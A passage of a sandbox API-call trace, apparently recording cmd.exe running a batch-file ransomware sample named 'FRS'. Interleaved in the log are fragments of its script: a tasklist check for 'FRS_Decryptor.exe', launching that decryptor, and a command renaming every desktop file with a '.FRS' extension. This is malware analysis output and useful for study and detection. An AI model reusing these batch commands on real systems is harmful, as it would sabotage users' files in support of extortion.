(_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0112.355] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0112.355] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0112.355] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0112.356] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0112.356] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0112.356] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0112.356] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0112.356] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0112.356] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0112.356] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0112.356] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0112.356] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0112.356] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0112.356] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0112.356] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0112.356] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0112.356] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0112.356] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0112.356] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0112.356] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0112.356] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x36c, hThread=0x260, dwProcessId=0x3d4, dwThreadId=0xafc)) returned 1 [0112.358] CloseHandle (hObject=0x260) returned 1 [0112.358] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0112.358] GetEnvironmentStringsW () returned 0xd7e510* [0112.358] FreeEnvironmentStringsA (penv="=") returned 1 [0112.359] WaitForSingleObject (hHandle=0x36c, dwMilliseconds=0xffffffff) returned 0x0 [0114.423] GetExitCodeProcess (in: hProcess=0x36c, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0114.423] CloseHandle (hObject=0x36c) returned 1 [0114.423] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0114.424] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0114.424] GetEnvironmentStringsW () returned 0xd30508* [0114.424] FreeEnvironmentStringsA (penv="=") returned 1 [0114.424] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0114.424] GetEnvironmentStringsW () returned 0xd7e510* [0114.424] FreeEnvironmentStringsA (penv="=") returned 1 [0114.424] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0114.424] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0114.424] _close (_FileHandle=3) returned 0 [0114.424] _get_osfhandle (_FileHandle=1) returned 0x28 [0114.424] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0114.424] _get_osfhandle (_FileHandle=1) returned 0x28 [0114.424] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0114.424] _get_osfhandle (_FileHandle=0) returned 0x24 [0114.424] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0114.424] SetConsoleInputExeNameW () returned 0x1 [0114.424] GetConsoleOutputCP () returned 0x1b5 [0114.425] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0114.425] SetThreadUILanguage (LangId=0x0) returned 0x409 [0114.425] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2b8 [0114.425] _open_osfhandle (_OSFileHandle=0x2b8, _Flags=8) returned 3 [0114.425] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0114.425] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0114.425] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0114.425] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0114.425] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0114.425] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0114.425] GetFileType (hFile=0x2b8) returned 0x1 [0114.425] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0114.425] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0114.425] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0114.425] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0114.425] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0114.425] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0114.425] GetFileType (hFile=0x2b8) returned 0x1 [0114.426] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0114.426] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0114.426] _tell (_FileHandle=3) returned 2627 [0114.426] _close (_FileHandle=3) returned 0 [0114.426] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0114.426] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0114.426] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0114.426] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0114.426] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0114.429] feof (_File=0x76ea4c68) returned 0 [0114.429] ferror (_File=0x76ea4c68) returned 0 [0114.429] fgets (in: _Buf=0xd819f8, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0114.900] feof (_File=0x76ea4c68) returned 0 [0114.900] ferror (_File=0x76ea4c68) returned 0 [0114.900] fgets (in: _Buf=0xd84e0e, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0114.935] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0114.936] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd44016, cbMultiByte=78, lpWideCharStr=0xd43fc8, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0114.936] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0114.936] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0114.936] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0114.936] _open_osfhandle (_OSFileHandle=0x158, _Flags=8) returned 3 [0114.936] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.936] SetFilePointer (in: hFile=0x158, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0114.937] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.937] GetFileSize (in: hFile=0x158, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0114.937] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0114.937] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.937] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0114.937] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.937] GetFileType (hFile=0x158) returned 0x1 [0114.937] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0114.937] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0114.937] SetFilePointer (in: hFile=0x158, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0114.937] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0114.937] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0114.937] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.937] GetFileType (hFile=0x158) returned 0x1 [0114.937] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0114.937] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0114.937] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0114.937] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0114.937] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.937] GetFileType (hFile=0x158) returned 0x1 [0114.937] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0114.937] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0114.937] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.937] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.937] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.937] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.937] GetFileType (hFile=0x158) returned 0x1 [0114.937] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.937] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.937] SetFilePointer (in: hFile=0x158, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0114.937] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0114.937] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0114.938] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.938] GetFileType (hFile=0x158) returned 0x1 [0114.938] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0114.938] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.938] SetFilePointer (in: hFile=0x158, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0114.938] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0114.938] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0114.938] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.938] GetFileType (hFile=0x158) returned 0x1 [0114.938] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0114.938] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.938] SetFilePointer (in: hFile=0x158, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0114.938] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0114.938] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0114.938] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.938] GetFileType (hFile=0x158) returned 0x1 [0114.938] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0114.938] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.938] SetFilePointer (in: hFile=0x158, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0114.938] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0114.938] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0114.938] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.938] GetFileType (hFile=0x158) returned 0x1 [0114.938] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0114.938] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.938] SetFilePointer (in: hFile=0x158, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0114.938] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\nl_flag.png\r\n") returned 73 [0114.938] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0114.938] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.938] GetFileType (hFile=0x158) returned 0x1 [0114.938] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0114.939] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.939] SetFilePointer (in: hFile=0x158, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0114.939] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0114.939] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0114.939] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.939] GetFileType (hFile=0x158) returned 0x1 [0114.939] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0114.939] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.939] SetFilePointer (in: hFile=0x158, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0114.939] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0114.939] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0114.939] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.939] GetFileType (hFile=0x158) returned 0x1 [0114.939] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0114.939] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.939] SetFilePointer (in: hFile=0x158, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0114.939] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0114.939] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0114.939] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.939] GetFileType (hFile=0x158) returned 0x1 [0114.939] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0114.939] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.939] SetFilePointer (in: hFile=0x158, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0114.939] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0114.939] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0114.939] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.939] GetFileType (hFile=0x158) returned 0x1 [0114.939] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0114.939] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.939] SetFilePointer (in: hFile=0x158, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0114.939] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0114.940] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0114.940] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.940] GetFileType (hFile=0x158) returned 0x1 [0114.940] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0114.940] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.940] SetFilePointer (in: hFile=0x158, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0114.940] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0114.940] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0114.940] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.940] GetFileType (hFile=0x158) returned 0x1 [0114.940] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0114.940] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.940] SetFilePointer (in: hFile=0x158, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 